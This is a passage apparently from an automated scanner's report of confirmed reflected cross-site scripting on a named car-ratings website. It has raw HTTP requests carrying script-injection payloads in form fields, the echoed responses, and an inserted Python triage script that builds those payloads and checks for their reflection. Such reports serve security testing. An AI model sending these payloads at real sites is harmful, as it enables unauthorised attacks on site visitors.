mo5        POST  3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 190
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&numCars='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000A67)%3c%2fscript%3e&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:46:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> 
<td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div 
class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div 
class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail 
to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select 
name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="'"--></style></script><script>netsparker(0x000A67)</script>" /> <input type="hidden" name="yr1" id="yr1" value="3" /> <input type="hidden" name="mk1" id="mk1" value="3" /> <input type="hidden" name="mo1" id="mo1" value="3" /> <input type="hidden" name="yr2" id="yr2" value="3" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="C..
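Reproduction and triage of the reflected XSS findings above (mk4 on /ratings.php, numCars and yr2 on /consumers.php), as an added example that is not part of the Netsparker report. What the request/response pairs show is that the probe '"--></style></script><script>netsparker(0x...)</script> is echoed verbatim inside the value="..." attribute of a hidden <input> in the ratingsSelection form: the raw double quote closes the attribute, the > closes the tag, and the browser then parses a fresh <script> element. Two details matter when you re-test by hand. The parameter tables print the probe as alert(...), but the requests actually carried netsparker(...), so search the body for whichever marker you send. And the field that reflects is not always the field that was injected: the probe sent as mk4 on /ratings.php came back in the value of mk2 (while yr3/mk3/mo3 came back empty), so a check that only looks at the input with the injected name misses it; search the whole body. The script below rebuilds the POST body for any of the form fields, scans a constructed excerpt of each of the two responses shown above for the unencoded probe and reports which input it landed in, and renders the same hidden input the way the page should (HTML-encoding the value for the attribute context, which is what PHP's htmlspecialchars with ENT_QUOTES does). The excerpts and marker values are copied from the report; the function and variable names are my own and not the site's code.

```python
"""Offline reproduction of the reflected XSS findings on /ratings.php and
/consumers.php (added example, not part of the Netsparker report)."""
import html
import re
from urllib.parse import parse_qs, urlencode

# Fields of the ratingsSelection form, in the order the report's requests send them.
FORM_FIELDS = ["numCars"] + [f"{p}{i}" for i in range(1, 6) for p in ("yr", "mk", "mo")]


def payload(marker: str) -> str:
    """The scanner's probe: a quote to close value="...", then --> and closing tags
    to break out of any comment/style/script context, then a fresh <script>."""
    return f"'\"--></style></script><script>netsparker({marker})</script>"


def build_body(target: str, marker: str, leading=()) -> str:
    """Form-encode the ratingsSelection fields with the probe in `target` and the
    scanner's filler value "3" everywhere else (leading=("Year",) for consumers.php)."""
    fields = list(leading) + FORM_FIELDS
    if target not in fields:
        raise ValueError(f"{target} is not a form field")
    return urlencode([(f, payload(marker) if f == target else "3") for f in fields])


def decode_body(body: str) -> dict:
    """Inverse of build_body: field -> value, to confirm what was sent."""
    return {k: v[0] for k, v in parse_qs(body).items()}


def find_reflections(body: str, marker: str) -> dict:
    """Locate the probe in a response body.

    Returns the names of the <input> elements whose value attribute contains the
    probe unencoded (each one is an exploitable reflection) and the number of
    HTML-encoded copies (harmless: the browser renders them as text)."""
    raw = payload(marker)
    unescaped = []
    for m in re.finditer(re.escape(raw), body):
        tag_start = body.rfind("<input", 0, m.start())   # the tag the probe landed in
        name = None
        if tag_start != -1:
            nm = re.search(r'name="([^"]+)"', body[tag_start:m.start()])
            name = nm.group(1) if nm else None
        unescaped.append(name)
    encoded = len(re.findall(re.escape(html.escape(raw, quote=True)), body))
    return {"unescaped_in": unescaped, "encoded_copies": encoded}


def render_hidden_input(name: str, value: str) -> str:
    """Hardened rendering of the hidden field: encode the value for an attribute
    context (the effect of PHP's htmlspecialchars($v, ENT_QUOTES, 'UTF-8'))."""
    safe_name = html.escape(name, quote=True)
    return (f'<input type="hidden" name="{safe_name}" id="{safe_name}" '
            f'value="{html.escape(value, quote=True)}" />')


# Constructed excerpts of the two responses in the report. On /ratings.php the
# probe was sent as mk4 but came back in mk2; on /consumers.php numCars echoed it.
RATINGS_EXCERPT = (
    '<input type="hidden" name="numCars" id="numCars" size="1" value="3" />\n'
    '<input type="hidden" name="yr2" id="yr2" value="3" />\n'
    f'<input type="hidden" name="mk2" id="mk2" value="{payload("0x000A54")}" />\n'
    '<input type="hidden" name="mo2" id="mo2" value="3" />\n'
)
CONSUMERS_EXCERPT = (
    '<div class="pagesubtitle">Your picks:</div> '
    f'<input type="hidden" name="numCars" id="numCars" size="1" value="{payload("0x000A67")}" /> '
    '<input type="hidden" name="yr1" id="yr1" value="3" />'
)


def triage() -> dict:
    """Run the check over both excerpts and over the hardened rendering of mk2."""
    fixed = render_hidden_input("mk2", payload("0x000A54"))
    return {
        "ratings.php": find_reflections(RATINGS_EXCERPT, "0x000A54"),
        "consumers.php": find_reflections(CONSUMERS_EXCERPT, "0x000A67"),
        "ratings.php (encoded)": find_reflections(fixed, "0x000A54"),
    }


if __name__ == "__main__":
    print(build_body("mk4", "0x000A54"))
    for page, result in triage().items():
        print(page, result)
```

To re-test a live target, send the output of build_body() as the body of a POST with Content-Type application/x-www-form-urlencoded and pass the full response body to find_reflections(); a non-empty unescaped_in list is the finding, and after the fix the same probe should only ever show up in encoded_copies.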
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter  Type  Value
Year       POST  3
numCars    POST  3
yr1        POST  3
mk1        POST  3
mo1        POST  3
yr2        POST  '"--></style></script><script>alert(0x000A9E)</script>
mk2        POST  3
mo2        POST  3
yr3        POST  3
mk3        POST  3
mo3        POST  3
yr4        POST  3
mk4        POST  3
mo4        POST  3
yr5        POST  3
mk5        POST  3
mo5        POST  3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 190
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000A9E)%3c%2fscript%3e&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:47:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> 
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
Year POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST '"--></style></script><script>alert(0x000A9F)</script>
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 190
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000A9F)%3c%2fscript%3e&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:47:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
Year POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST "><script>alert(9)</script>
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 151
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=%22%3e%3cscript%3enetsparker(9)%3c%2fscript%3e&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:47:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
Year POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST '"--></style></script><script>alert(0x000AD7)</script>
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 190
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000AD7)%3c%2fscript%3e&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:48:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> 
<td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div 
class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div 
